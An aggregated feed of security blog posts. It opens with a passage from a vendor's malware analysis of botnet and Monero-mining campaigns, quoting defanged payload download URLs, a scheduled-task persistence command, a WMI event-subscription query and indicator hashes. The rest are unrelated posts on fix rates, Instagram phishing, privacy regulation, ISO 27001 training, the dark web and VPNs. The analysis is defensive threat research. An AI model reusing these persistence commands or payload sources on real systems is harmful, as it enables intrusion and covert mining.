  1. It also performs network scan for which it collects the Public/Private IP of the system and all the  associated information such as Geo Location etc. Then attacker spoofs his own IP against the current system IP and using masscan it performs scanning of other devices.

By these steps it converts this system into a bot and adds to their bot network. Its code has been developed in C++ and distributed across many sources like-

CheckUpdate.cpp
Cracker_Inline.cpp
Cracker_Standalone.cpp
CThreadPool.cpp
Logger_Stdout.cpp
Scanner_Tcp_Connect.cpp
Scanner_Tcp_Raw.cpp
cService.cpp
ServerAgent.cpp
Task_Crack_Ipc.cpp
Task_Crack_Mssql.cpp
Task_Crack_Rdp.cpp
Task_Crack_Ssh.cpp
Task_Crack_Telnet.cpp
Task_Crack_Wmi.cpp
Task_Scan.cpp WPD.cpp

It basically targets IoT devices which contain embedded Linux. So it has used BusyBox (a software suite that provides UNIX utilities also called as Swiss Army Knife of embedded Linux) for executing remote commands after compromising/cracking those devices through various ways mentioned above.


VBS/BAT Agent For Download Miner:

First the payload will be dropped and executed on the below location in the victim machine.

hxxp://213.183.60.7/b.exe                      ( downloaded at C:\windows\inf\msief.exe)

On execution, it will drop the VBS and batch file in the below mentioned location and execute the vbs file by invoking wscript.exe which eventually execute the bat file.

C:\Windows\web\c3.bat
C:\Windows\web\n.vbs

The bat file contains a lot of code, which will modify attributes of some folder/files, kill some specific processes, delete some files, modifies the access control of some folder/files, make persistent for multiple payload in the system via registry, task scheduler, WMI Event subscription and also modifies the firewall policy by blocking 445,139 ports.

 

Fig. 4 Part of C3.bat code

There are also two more additional payloads which are downloaded from one of C2 server present in xpdown.dat; one is a diskwritter, a DLL file , dropped at “C:\Windows\debug” location. It will execute on system start as it has an entry in task scheduler added by the above bat file.

schtasks /create /tn “Mysa1” /tr “rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa” /ru “system”  /sc onstart /F

And the second one is the final payload i.e. XMRig Monero Miner, a 64 bit executable downloaded from hxxp://174.128.248.10/64.rar at “C:\windows\debug\lsmos.exe”

On execution, it unpacks itself and drops 3 files on the current execution folder, one is an executable (lsmose.exe -64 bit packed with VM Protect) file and two DLLs (xmrstak_cuda_backend.dll and xmrstak_opencl_backend.dll), which helps miner for successful execution.

One more similar case we have observed, a base64 encoded PowerShell script which is basically a cryptomining malware hiding in WMI class to evade AV and most of the security product due to its stealthy and unique feature.

After decoding we get the following code:

Fig. 5 Base64 Decoded script

 

Following is basic workflow of the malware.

Fig. 6 Basic workflow of miner with WMI class

On execution, it checks whether IP/Domain is alive or not mentioned in the code. If it is available, it requests for banner and receive a response as ‘SCM Event1 Log

Fig. 7 Request for “banner” and another PowerShell Payload

After that malware queries for ‘FilterToConsumerBinding’ WMI Class by executing the below command

$a=([string](Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding))

and then checks whether it contains ‘SCM Event1 Log’. If not present, then it downloads and executes in6.ps1 (64 bit) or in3.ps1 (32 bit) by Invoking Expression(IEX).

 

Fig. 8 Request for powershell script

in6.ps1/in3.ps1:

These scripts consist of two parts, first part is a base64 encoded Gzip data stream and second part contains obfuscated code. After de-obfuscation, the code reassembles similar to initial base64 encoded script with additional features.

Fig 9 decoded in6.ps1

The encoded gzip contains four files as mentioned below:

  1. ‘mini’ – Mimikatz, a credential stealer
  2. ‘mon’ – Monero CPU Miner
  3. ‘funs’ – Collection of functions having function to execute remote DLL via WMI and eternal blue vulnerable scanning.
  4. ‘sc’ – Shellcode to execute on another systems and to download same payload, if it is vulnerable to eternal blue.

It creates a WMI Class “systemcore_Updater0” under the Namespace “root\default” and adds properties like mimi, mon, funs, sc, ipsu and i17.

Fig 10 Properties of WMI Class “systemcoreUpdater0”

Then it sets the filtername=”SCM Event1 Log Filter” and consumername=”SCM Event1 Log Consumer”

When attacker uses WMI as a persistence mechanism, instances of __EventFilter,_EventConsumer and __FilterToConsumerBinding have to be created and an _InstanceCreationEvent event is fired.

In this case, attacker uses following query as the EventFilter and binds it with the initial base64 encoded script, which will eventually get executed approximately in every 3 hrs.

SELECT * FROM __InsanceModificationEvent WITHIN 10600 WHERE TargetInstance ISA Win32_PerfFormattedData_PerfOS_System

Fig 11 Initial PS script hidden in WMI Class

It has tried to delete the task scheduler entry “sysupdater0” also checks “sysupdater0.bat” in %systemroot% , if exists remove that as well.

Modifies Windows sleep, hibernate and power plan setting by invoking the following command:
powercfg /CHANGE -standby-timeout-ac 0
powercfg /CHANGE -hibernate-timeout-ac 0
powercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 000

It removes all WMI Object in __FilterToConsumerBinding class under Namespace “root\subscription” if filter name has not matched with “SCM Event0 Log”

Then it kills the process if it has an “ESTABLISHED” connection with port number 3333, 5555 or 7777.

It makes a list of PIDs of running “Powershell” processes and the network connections of the system. It then checks for the process with “ESTABLISHED” connection and associated port number 80 or 14444 or 14433 or 443. If no such processes exist and the count of running PowerShell processes are less than 8 then it executes the Monero Miner using “funs” module. After that it executes the mimikatz and dumps the credential irrespective of execution of Monero Miner.

It also enumerates the network addresses and checks for the IPs that are active and adds them to the property named, ‘ipsu’. It then scans those IPs to identify the systems which are vulnerable to MS17-010 (with Eternal Blue Scanner Script), stores them to the property ‘i17’ and finally executes shell code which will download the ze3.ps1 or ze6.ps1 exactly similar to in3.ps1 or in6.ps1 based on OS architecture.

Fig 12 Shell code executed by invoking “WinExec”

Shell code downloads and executes the PS Script to infect other vulnerable systems. This way it spreads and mines the other systems on the networks.

So in both the cases, the open source tools are abused heavily to perform the attack. Mimikatz, masscan, eternal blue vulnerability scanner seems to be popular tools among the malware authors. Similar techniques are being used for spreading the ransomware too. Seqrite successfully detects such attacks at various detection levels.


Indicator of Compromise:

790C213E1227ADEFD2D564217DE86AC9FE660946E1240B5415C55770A951ABFD
46BC86CFF88521671E70EDBBADBC17590305C8F91169F777635E8F529AC21044
AE161E582DE9EC380B3E0B295EFFD62EB8889AC35BC6631A9492CF41563ED14A
0E91F531A05C70B6CF3A8FA942B91A026A5B57069AA5B5C8DFE1EBCBC63AEAE9
EAEF82223EEB8CF404A1D46613D36B9E582304B215201B5E557DB578DD73E04E
30CDBB5C9E23758E8C74E9FDBAEE893D67D3BA42B3B09196CF98395738A67F56
7EC433DD0454553B09F11C39944E251E3EE32E4981F52F02ADC3011EB0CE6537
EA7CEDE3BCB8AD6A8E9FED3CB34F8E6746D445E2044455261EAD4E5092070408
88D338D9FC1990E3D48CDB7E704E785953271EEAB97F196BBCD0C4D2D76F7DC3
789CBE603582262914191882DEC7E6A6F1D61D062D2BDF21B8892BC5854C6196
9868C6F0F23FB81229E2EF765FF524602244384C420D14FFD5708341D85EF4CE
D256AF525680DF6A6178AD608D1700FE5178AA2F3EFE4A52DBCF7AD7EA524936

 

Subject Matter Expert:

Priyanka Shinde, Goutam Tripathy, Vallabh Chole
Security Labs, Quick Heal Technologies, Ltd.

The post Miners snatching open source tools to strengthen their malevolent power! appeared first on Seqrite Blog.

TrustArc Partnering with IAPP to Benchmark Privacy Tech Adoption

As privacy tech continues to proliferate and embed itself in day-to-day privacy functions in the enterprise, the IAPP, together with TrustArc, seeks feedback to better understand how privacy pros are adopting the privacy tech tools outlined in our Privacy Tech Vendor Report. This year’s survey builds on a similar one we did last year looking at how privacy tools are acquired and deployed. Now, with obligations that both the EU General Data Protection Regulation (GDPR) and California Consumer Privacy Act (CCPA) are imposing on organizations, are we seeing a move toward greater tech adoption? The survey should only take about … Continue reading TrustArc Partnering with IAPP to Benchmark Privacy Tech Adoption

The post TrustArc Partnering with IAPP to Benchmark Privacy Tech Adoption appeared first on TrustArc Blog.

What Is Fix Rate, and Why Does It Matter?

Once your application security program is up and running, there are several metrics you can use to gauge your progress and optimize your program. For instance, companies typically measure their scan activity, flaw density, and policy compliance. However, very few include metrics for fix rate, despite the fact that it is an important indicator of a program’s success. Fix rate indicates how long it takes for a team to fix the vulnerabilities their scans find. Fix rate is calculated as follows:

Fix Rate = Fixed Flaws divided by (Fixed + Open Flaws)

Looking at fix rate over time measures the average velocity at which organizations are fixing flaws.

All the metrics mentioned above are important, but fix rate is especially critical. Ultimately, the most important function of an application security program effectively fixing flaws once they are discovered. In the end, you can’t scan your way to secure code.

What are the average fix rates?

For our most recent State of Software Security (SoSS) report, we analyzed the data compiled from the 700,000 scans we performed over a 12-month period between April 1, 2017 and March 31, 2018, and this reveals a pretty clear picture of the current state of fix rates.

When we look at the curve for the average fix velocity from the first day of discovery, we see that it takes organizations a troubling amount of time to address most of their flaws. One week after first discovery, organizations close out only about 15 percent of vulnerabilities. In the first month, that closure reaches just under 30 percent. By the three-month mark, organizations haven’t even made it halfway, closing only a little more than 45 percent of all flaws.

When we looked at fix rate by flaw type, we found that organizations are making a big push to fix their highest severity vulnerabilities first. Organizations managed to reach closure on 75 percent of these high-severity flaws more than 100 days sooner than the norm.

But the numbers aren’t so positive for other vulnerability rankings, such as exploitability or business criticality.

Why are fix rates important?

Speed matters when it comes to application security. The time it takes for attackers to come up with exploits for newly discovered vulnerabilities is measured in hours or days. Letting known vulnerabilities linger unfixed dramatically increases your risk. For instance, it was merely days between disclosure and exploitation of the vulnerability in the Apache Struts framework that led to the Equifax breach.

In addition, it’s important to address the most high-risk vulnerabilities the fastest. Our SoSS stats surrounding fix rate by flaw type (mentioned above) are important here. The fact that most organizations are solely focused on fixing high-severity flaws, but have troubling fix rates for flaws that are highly exploitable or business critical is problematic. Oftentimes, a low-severity flaw could be just as risky, if not more so, than a higher-severity flaw. For example, a low-severity information leakage flaw could provide just the right amount of system knowledge an attacker needs to leverage a vulnerability that might otherwise be difficult to exploit.

How can we improve our fix rate?

Here are some ways to give your fix rate a boost:

Prioritize more

Reconsider your application security policy to ensure you are taking steps to reduce your most high-risk vulnerabilities the fastest. The sheer volume of open flaws within enterprise applications is too staggering to tackle at once -- which means that organizations need to find effective ways to prioritize which flaws they fix first.

For instance, not all apps are created equal, so create different requirements for different apps. An application that has IP, is public facing, and has third-party components may require all medium to very critical flaws to be fixed. A one-page temporary marketing site may only require high/very high flaws to be fixed.

In addition, consider a flaw’s exploitability, not just its severity. As noted above, some low-severity flaws could be highly exploitable, while some high-severity flaws would never be exploitable.

Scan more

This year’s State of Software Security report also revealed that those organizations that scan most frequently have the highest fix rates. Our data shows that there is a very strong correlation between how many times a year an organization scans and how quickly they address their vulnerabilities.

When apps are tested fewer than three times a year, flaws persist more than 3.5x longer than when organizations can bump that up to seven to 12 scans annually. Each step up in scan rate results in shorter and shorter flaw persistence intervals. Once organizations are scanning more than 300 times per year, they’re able to shorten flaw persistence 11.5x across the intervals compared to applications that are only scanned one to three times per year.

Prevent more

The less flaws you have to tackle, the faster you can tackle them. If developers have the secure coding skills needed to avoid introducing flaws in the first place, they will put a big dent in the work needed to fix flaws later in the cycle. But most developers have had zero training on secure coding – either in school or on the job. Our research has shown that when developers do get training or coaching on secure coding, the organization’s fix rate gets a big boost. When our customers offer eLearning on secure coding for their development team, they improve their fix rate by 19 percent. When they take advantage of remediation coaching, they improve it by a whopping 88 percent.

Learn more

There’s more to AppSec than scanning. Get details in our new eBook, Application Security: Beyond Scanning.

Something’s Phishy With the Instagram “HotList”

Phishing scams have become incredibly popular these days. Cybercriminals have upped the ante with their tactics, making their phishing messages almost identical to the companies they attempt to spoof. We’ve all heard about phishing emails, SMiShing, and voice phishing, but cybercriminals are turning to social media for their schemes as well. Last week, the “Nasty List” phishing scam plagued Instagram users everywhere, leading victims to fake login pages as a means to steal their credentials. Now, cybercriminals are capitalizing on the success of the “Nasty List” campaign with a new Instagram phishing scam called “The HotList.”

This scam markets itself as a collection of pictures ranked according to attractiveness. Similar to the “Nasty List,” this scheme sends messages to victims through hacked accounts saying that the user has been spotted on this so-called “hot list.” The messages claim to have seen the recipient’s images on the profile @The_HotList_95. If the user goes to the profile and clicks the link in the bio, they are presented with what appears to be a legitimate Instagram login page. Users are tricked into entering their login credentials on the fake login pages, whose URL typically ends in .me domains. Once the cybercriminals acquire the victim’s login, they are able to use their account to further spread the campaign.

Images courtesy of Bleeping Computer. 

Luckily, there are steps users can take to help ensure that their Instagram account stays secure:

  • Be skeptical of messages from unknown users. If you receive a message from someone you don’t know, it’s best to ignore the message altogether or block the user. And if you think a friend’s social media account has been compromised, look out for spelling mistakes and grammatical errors in their message, which are common indicators of a potential scam at play.
  • Exercise caution when inspecting links sent to your messages. Always inspect a URL before you click on it. In the case of this scam, the URL that appears with the fake login page is clearly incorrect, as it ends in .me.
  • Reset your password. If your account was hacked by “The HotList” but you still have access to your account, reset your password to regain control of your page.

And, of course, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home  on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Something’s Phishy With the Instagram “HotList” appeared first on McAfee Blogs.

Facebook Braces for Multibillion Dollar Fine

Facebook announced that it was preparing for a massive fine from the Federal Trade Commission for its mishandling of user privacy. The fine could be as much as $5 billion.

The social media giant revealed the fine as a one-time expense in its annual earnings statement, explaining a 51% decline in income, “in connection with the inquiry of the FTC into our platform and user data practices.”

“We estimate that the range of loss in this matter is $3.0bn to $5.0bn,” the company’s statement explained. “The matter remains unresolved, and there can be no assurance as to the timing or the terms of any final outcome.”

Facebook has been the target of an FTC investigation to determine if it had violated a 2011 consent decree following the 2018 revelation that it improperly shared data with Cambridge Analytica.

Despite the size of the fine, the company showed continuous growth and an expansion of its ecosystem of apps.

Read more about the story here.

The post Facebook Braces for Multibillion Dollar Fine appeared first on Adam Levin.

ISO 27001 Lead Implementer, Lead Auditor and Internal Auditor – what’s the difference?

A version of this blog was originally published on 25 June 2018.

Anyone interested in getting into or advancing their career in cyber security probably knows that they will need training and qualifications. But given that the field is so broad, how are you supposed to decide which course is right for you?

This blog will help you make that decision. We take three of our most popular training courses – ISO27001 Certified ISMS Internal AuditorISO27001 Certified ISMS Lead Auditor and ISO27001 Certified ISMS Lead Implementer – and explain what they cover and who they are suitable for.

ISO 27001 Certified ISMS Lead Implementer

A lead implementer takes charge of an organisation’s ISO 27001 compliance project. They are responsible for the big decisions, such as setting out the ISMS’s scope, and for ensuring the Standard’s requirements have been addressed.

What you learn: The nine key steps involved in planning, implementing and maintaining an ISO 27001-compliant ISMS.

Who it’s for: This course should be attended by the person responsible for ISO 27001 compliance (typically the CISO) and the person leading the project (this might be the same person). You’ll need a solid understanding of ISO 27001’s risk assessment process, and should have already taken a foundation-level ISO 27001 course.

Length: Three days

ISO 27001 Certified ISMS Lead Auditor

A lead auditor can work internally or audit a second or third party’s ISMS. Their expertise is usually required when the organisation is seeking ISO 27001 certification, or if a partner organisation requests a supply chain audit.

What you learn: The first half of the course teaches you about auditing in general, and the second half covers best-practice advice for how to audit an ISMS.

Who it’s for: Anyone who wants the responsibility for implementing and maintaining their organisation’s ISMS. It’s also suitable for those who want to work for a specific auditing organisation, such as the BSI.

Length: Four and a half days

ISO 27001 Certified ISMS Internal Auditor

An internal auditor assesses the effectiveness of the organisation’s ISMS (information security management system) and whether it meets the requirements of ISO 27001, reporting their findings to senior management.

What you learn: The course begins with an introduction to ISO 27001 and how auditing fits into the compliance process, before explaining how to plan for and execute an internal audit.

Who it’s for: It’s ideal for compliance managers, but it’s obviously suitable for anyone interested in conducting internal audits. You should have a decent understanding of ISO 27001, but your main strengths should be in policy reviews.

Length: Two days

What are the differences between these courses?

Even though each of these courses cover similar areas, they are geared towards specific job roles. Take the internal and lead auditor courses as an example.

An internal auditor could be an employee within the organisation (hence ‘internal’), but they ideally wouldn’t have played a major role in the ISMS’s implementation. Otherwise they are being asked to find faults in their own work, which they might be reluctant to do.

Meanwhile, a lead auditor will have the specialist knowledge required to conduct second- or third-party audits. Although the tasks involved in these two roles are similar, the day-to-day work is very different. Whereas an internal auditor only has to be familiar with their organisation’s ISMS, a lead auditor that works for an auditing company deals with many organisations and interacts with even more people.

Then we come to the lead implementer course, which teaches you how to fulfil a completely different job role. Lead implementers are the heart of the team that puts the ISMS together. As with auditors, they need a strong understanding of ISO 27001’s compliance requirements, but their job focuses on how to meet those requirements, as opposed to reviewing whether they have been implemented correctly.

Of course, consultants will need to be implementation and auditing experts. They should therefore consider our ISO27001 Lead Implementer and Lead Auditor Combination Course, which covers everything you’d learn on each course separately. You’ll move straight from one topic to the other, helping you solidify your knowledge and understand how the two roles interact.

Interested in other ISO 27001 training courses?

These courses are just the beginning when it comes to ISO 27001 training, so if you’re not sure which course is right for you, why not take a look at IT Governance’s full range of training options?

With a variety of courses available in classroom, Live Online and distance learning format, we have you covered, whether you’re an information security beginner or looking for the right qualification to boost your career.

Find out more about our ISO 27001 training courses >>

The post ISO 27001 Lead Implementer, Lead Auditor and Internal Auditor – what’s the difference? appeared first on IT Governance Blog.

Privacy Shield Approaching Its 3 Year Anniversary in Operation

With data protection-related activity bustling around the world–from “Brexit” and GDPR enforcement to the approaching CCPA and exciting developments in the APAC region–it’s understandable to lose track of the EU-U.S. and Swiss-U.S. Privacy Shield Frameworks. What follows are responses to the most frequent Privacy Shield inquiries TrustArc is hearing from our customers. Is Privacy Shield Still Valid? Yes – in fact, Privacy Shield is fast approaching its three year anniversary on July 12th. Since its 2016 adoption, Privacy Shield has remained a sound, scalable and steady legal transfer mechanism for U.S. entities seeking to receive personal data from the EU … Continue reading Privacy Shield Approaching Its 3 Year Anniversary in Operation

The post Privacy Shield Approaching Its 3 Year Anniversary in Operation appeared first on TrustArc Blog.

The Cybersecurity Dangers of the Dark Web and How to Protect Your Organization

Even as its top marketplace, Dream Market, prepares to close its doors, the dark web continues to thrive. In fact, Darkode, one of the most well-known hacking forums and black markets, has recently reopened. And what are some of the most common wares at these underground markets? Organizational data, and the tools needed to get more. As long as the dark web exists, organizations must learn more about the threat they pose, and how to protect themselves.

A One Stop Shop for Cyber Attack Tools

There are any number of ways attackers can use the dark web to find what they need to attack an organization. One of the most common items is ransomware, which has become worryingly affordable. For less than $1000, anyone can buy a malware strain that can be used again and again. While individuals are frequently ransomed, organizations are naturally a much more lucrative target. In fact, ransoms for organizations are rapidly increasing, with the average payment per incident going from around $7,000 in the final quarter of 2018 to almost $13,000 in the first quarter of 2019. 

The marketplace isn’t limited to digital purchases. Interested parties can also buy physical means of attack like credit card skimmers or USB drives loaded with malware. Recently, a former student managed to destroy 59 computers at a small college in New York in a single evening using a “USB Killer,” a USB thumb drive that discharges electrical current to fry any device to which it is connected. Though the “USB Killer” is shockingly legal to buy, such an item or similar is also available on the dark web to those who don’t want their purchase to be tracked. Such physical items would be particularly effective in the hands of a malicious insider who has access to workstations and servers.

The dark web is also a refuge for those who are inexperienced in digital attacks. Thousands of fraud guides are available to those eager to learn more about multiple different types of attacks like phishing, brute force, or even simple account takeovers. These guides are incredibly cheap, typically only running someone five to ten dollars. Hacking services are also readily available. The recent reopened Darkode, mentioned earlier, specializes in customized hacking jobs, as well as providing simpler services like renting a botnet to mount a DDoS attack.

An Underground Marketplace to Sell Your Breach Bounty

The goal for many types of malware is breaching systems to steal data. Attackers can utilize stolen credentials to use for themselves to commit identity fraud. However, oftentimes these breaches are so large that the amount of data stolen is more than an individual could use in a lifetime. Selling these credentials is even more lucrative than using the data for themselves. The dark web is the most natural and best place to sell these records. A hacker known as Gnosticsplayers has posted hundreds of millions of accounts for sale on the dark web, earning thousands of dollars in bitcoin.

Usernames and passwords are far from the only thing for sale. The dark web has someone’s entire identity for sale, from social security numbers to bank account numbers. For example, old tax returns stolen from accounting and legal firms are readily available for next to nothing. An old W2 can cost a few dollars or less, and makes it possible to file fraudulent returns, open accounts, and other identity scams.

Stolen information isn’t limited to human identities, either. Hackers are now trafficking in digital trust and machine identities as well, selling data like SSL and TLS certificates, which can be used to commit a number of different types of attacks. As more and more types of data come up for sale, the less confidence organizations and users can have in the security of the internet at large.

Not for Sale: Keeping Data Off the Dark Marketplace

With seemingly endless ways to perpetrate attacks, and a ready-made spot to sell the bounty of these attacks, it’s easy to feel daunted at the prospect of how to put up defenses. However, there are plenty of ways for your organization to prevent or remediate any threats from the dark web. 

Just as you keep locks on every door and window to your house, so should you protect every endpoint in your organization. While antivirus on workstations is routine, a high priority should also be placed on server specific, native antivirus for your servers, which are the key storage areas data attackers and threat actors are eager to exploit. Internet of Things (IoT) devices are becoming commonplace to the workplace, but preventative security specific to such devices is difficult to find. Given the prevalence of botnets on the dark web, it’s critical to ensure that your smart device is not part of such a network. Advanced threat detection solutions are the best way to find out if any IoT device, be it tablet or MRI machine, is infected with malware or being used for malicious purposes.

Insider threats should also be strongly considered when evaluating solutions. Insiders naturally have more access to data, and a simple purchase from the dark web could devastate an organization without proper monitoring and controls. Security solutions that enforce least privilege and detect anomalies within an organization can help defend against insider threats.

Monitoring can be provided by SIEM solutions, which filter numerous data sources and provide helpful insights through normalization and correlation. They can also identify suspicious behavior inside and outside of your organization   through real-time updates, threat prioritization, and reducing the number of interfaces in need of monitoring.

Control can be achieved with Identity and access management (IAM) solutions, which enable a robust approach to managing and governing access by utilizing the principle of least privilege, which highlights granting users only the access they need, when and how they need it. Employees require some access to complete their job, but not universal access, which can be all too tempting to exploit.

Finally, what better way to prevent being attacked than by thinking like the attackers? Penetration tests utilize ethical hacking to safely exploit security vulnerabilities, providing organizations insight and enabling remediation before an attack ever takes place. Regular penetration testing keeps organizations up to date on the latest strategies and tactics used by threat actors and the tools they provide on the dark web. Threat actors thrive in environments where individuals and organizations remain ignorant, hoping that their fear will overwhelm them into inaction. Staying vigilant and being proactive about building a strong security portfolio to set up barriers to your data is the best way to keep your information safe in their databases, and off the dark web.

Actionable Insight Identity and Access Management Network Insight Penetration testing
Big text: 
Blog
Resource type: 
Blogs

Antivirus vs. VPN: Do You Need Both?

Reading Time: ~3 min.

Public concern about online privacy and security is rising, and not without reason. High-profile data breaches make headlines almost daily and tax season predictably increases instances of one of the most common types of identity theft, the fraudulent filings for tax returns known as tax-related identity theft

As a result, more than half of global internet users are more concerned about their safety than they were a year ago. Over 80% in that same survey, conducted annually by the Center for International Governance Innovation, believe cybercriminals are to blame for their unease.  

Individuals are right to wonder how much of their personally identifiable data (PII) has already leaked onto the dark web. Are their enough pieces of the puzzle to reconstruct their entire online identity?  

Questions like these are leading those with a healthy amount of concern to evaluate their options for enhancing their cybersecurity. And one of the most common questions Webroot receives concerns the use of antivirus vs. a VPN.  

Here we’ll explain what each does and why they work as compliments to each other. Essentially, antivirus solutions keep malware and other cyber threats at bay from your devices, while VPNs cloak your data by encrypting it on its journey to and from your device and the network it’s communicating with. One works at the device level and the other at the network level.  

Why You Need Device-Level Antivirus Security 

Antiviruses bear the primary responsibility for keeping your devices free from infection. By definition, malware is any software written for the purpose of doing damage. This is the category of threats attempting to undermine the antivirus (hopefully) installed on your PC, Mac, and yes, even smartphones like Apple and Android devices, too.  

In an ever-shifting threat landscape, cybercriminals are constantly tweaking their approached to getting your money and data. Banking Trojans designed specifically for lifting your financial details were among the most common examples we saw last year. Spyware known as keyloggers can surreptitiously surveil your keystrokes and use the data to steal passwords and PII. A new category of malware, known as cryptojackers, can even remotely hijack your computing power for its own purposes.  

But the right anti-malware tool guarding your devices can protect against these changing threats. This means that a single errant click or downloaded file doesn’t spell disaster. 

“The amazing thing about cloud-based antivirus solutions,” says Webroot threat analyst Tyler Moffit, “is that even if we’ve never seen a threat before, we can categorize it in real time based on the way it behaves. If it’s determined to be malicious on any single device, we can alert our entire network of users almost instantaneously. From detection to protection in only a few minutes.” 

Why You Need Network-Level VPN Security 

We’ve covered devices, but what about that invisible beam of data traveling between your computer and the network it’s speaking to? That’s where the network-level protection offered by a VPN comes into play.  

While convenient, public networks offering “free” WiFi can be a hotbed for criminal activity, precisely because they’re as easy for bad actors to access as they are for you and me. Packet sniffers, for instance, can be benign tools for helping network admins troubleshoot issues. In the wrong hands, however, they can easily be used to monitor network traffic on wireless networks. It’s also fairly easy, given the right technical abilities, for cybercriminals to compromise routers with man-in-the-middle attacks. Using this strategy, they’re able to commandeer routers for the purpose of seeing and copying all traffic traveling between a device and the network they now control.  

Even on home WiFi networks, where you might expect the protection of the internet service provider (ISP) you pay monthly, that same ISP may be snooping on your traffic with the intent to sell your data.  

With a VPN protecting your connection, though, data including instant messages, login information, social media, and the rest is encrypted. Even were a cybercriminal able to peek at your traffic, it would be unintelligible.  

“For things like checking account balances or paying bills online, an encrypted connection should be considered essential,” says Moffit. “Without a VPN, I wouldn’t even consider playing with such sensitive information on public networks.”  

How Webroot Can Help 

Comprehensive cybersecurity involves protecting both data and devices. Antivirus solutions to protect against known and unknown malware—like the kinds that can ruin a laptop, empty a bank account, or do a cybercriminals bidding from afar—are generally recognized as essential. But for complete protection, it’s best to pair your antivirus with a VPN—one that can shield your data from intrusions like ISP snooping, packet sniffers, and compromised routers.  

Click the links for more information about Webroot SecureAnywhere® antivirus solutions and the Webroot® WiFi Security VPN app.  

The post Antivirus vs. VPN: Do You Need Both? appeared first on Webroot Blog.

How important is it to test your cybersecurity incident response plan?

Estimated reading time: 2 minutes

With the incidents of cybercrime rising at an enormous rate, especially targeted attacks on organizations, many companies now have a cybersecurity incident response plan in place.

However, a major reason these organizations still fail to respond effectively to a cybersecurity incident is because, in spite of having an incident response plan, it is never frequently tested nor consistently applied across the organization.

Given the ever evolving nature of threat landscape, it is extremely important to test the response plan on a frequent basis to check for loopholes in the process. Failure to upgrade this plan, often leaves organizations vulnerable and less prepared to handle the cybersecurity incident response process in the wake of a sudden cyber-attack.

The need is to test the plan regularly by making effective investments in skilled resources, technologies and processes, so that they can work in sync with each other when the need arises.

Few things that can help organizations test and implement an effective cybersecurity incident response plan include:

Automation

Investing in automation can be a good and cost effective option in this regard and can help organizations save up on millions of dollars that may otherwise be compromised in the event of a breach.

Automation here refers to replacing or augmenting human intervention with artificial intelligence and machine learning, to enable easy & efficient identification of breaches and exploits, for necessary and timely actions to be taken.

Studies indicate that organizations that leverage automation extensively across their organization are in a better position to detect, prevent and respond to cyber-attacks and breaches than organizations that don’t.

Skilled Resources

The lack of enough skilled resources for handling cyber-attacks and managing incident response plan, comes as a big hurdle for organizations to achieve cyber resilience. The major problem lies not just in hiring resources but mostly in retaining cybersecurity professionals.

On the other hand, deploying too many processes and technologies at once to achieve cyber resilience, can make the overall process complex for cybersecurity personnel to understand and reduce the effectiveness of the plan.

Thus, what organizations need, is to have a perfect collaboration of technology, resources and processes, in order to effectively test and implement a robust cybersecurity incident response plan.

The post How important is it to test your cybersecurity incident response plan? appeared first on Seqrite Blog.

How do I buy a laptop with an encrypted hard drive?

Derek needs to find a laptop with Windows 10 Home’s device encryption to keep his data safe

I want to buy a new Windows 10 laptop for home use, and I want one with device encryption capability, so that the boot drive is encrypted. Until recently, this has only been possible with Windows Professional editions using BitLocker. I now see that if a laptop has the right specification, all versions of Windows 10 can have device encryption turned on.

The problem is that it’s difficult, if not impossible, to get information from mainstream laptop vendors as to whether a specific model supports device encryption. Recent MacBooks are capable of using FileVault and Apple spells out which models support it, so why is this information so hard to find for Windows laptops? Derek

I’m glad you asked because you’re right: there’s a shocking lack of information about device encryption on laptops, and this applies to Microsoft, to PC manufacturers, and to retailers. It’s also something that laptop PC reviewers rarely seem to mention, which makes it hard, if not impossible, to tell how many laptops are compatible with Windows 10’s device encryption.

Continue reading...

French Government App Shows Difficulties with Secure Communications

A messaging app released by the French government to secure internal communications has gotten off to a troubled start.

Tchap was released in beta earlier this month as a secure messaging app exclusively for government officials. Its development and release was made to address security concerns and data vulnerabilities in more widely used apps including WhatsApp and Telegram (a favorite of French Prime Minister Emmanuel Macron).

WhatsApp Meet “What Were You Thinking?”

Tchap was built with security in mind, and was initially touted as being “more secure than Telegram.” Man plans and God laughs. The app was hacked within less than a day of its release. Elliot Alderson, the hacker who discovered the initial security vulnerability, subsequently found four more major flaws in its code, and confirmed with the app’s developer that no security audit was performed on the app prior to release.

DINSIC, the government agency responsible for Tchap, issued a press release stating that the software “will be subject to continuous improvement, both in terms of usability and security,” and has since announced a bug bounty for further vulnerabilities.

The French government’s attempts at creating a secure messaging alternative highlights a cybersecurity conundrum. Recent incidents including the allegations of Chinese government “backdoors” in telecom giant Huawei’s hardware and confirmed NSA backdoors in Windows software have left governments and businesses increasingly wary of using software or hardware developed or data stored internationally. At the same time, development of in-house or “proprietary” solutions are significantly more resource-intensive and not necessarily more secure than their more widely used counterparts.

 

The post French Government App Shows Difficulties with Secure Communications appeared first on Adam Levin.

Notice: What Happens on Public Computers, Stays on Public Computers

Reading Time: ~4 min.

These are the places your digital tracks can be dug up. With a little sleuthing.

Experts have warned for years of the risks of using public computers such as those found in libraries, hotels, and airline lounges. 

Many warnings focused on the potential for hackers to plant keystroke loggers, or intercept data as it flows across the internet. Indeed, in 2014, the National Cybersecurity and Communications Integration Center of the U.S. Secret Service issued an advisory for “owners, managers, and stakeholders in the hospitality industry” concerning data breaches. The text of the advisory claimed, “The attacks were not sophisticated, requiring little technical skill, and did not involve the exploit of vulnerabilities in browsers, operating systems or other software.” A 2014 announcement may seem to be an outdated reference, except that the recent Marriott data breach of over 300 million records was attributed to an attack in…wait for it…2014.)

But spyware and keyloggers aren’t the most common threat to the users of business center and other public computers. Forgetfulness, operating systems, applications, and temporary files are high up on the list. For several years I have searched public computers, mostly at hotels, to see what kinds of information people have left behind. It’s been an interesting passion project, to say the least.  

Uncovering a Very Public Digital Paper Trail

The first places I look are the documents, downloads, desktop, and pictures folders. The pictures folder typically yields the least interesting information, usually pictures of groups of drunken people, group gatherings at restaurants, weddings, or cats.

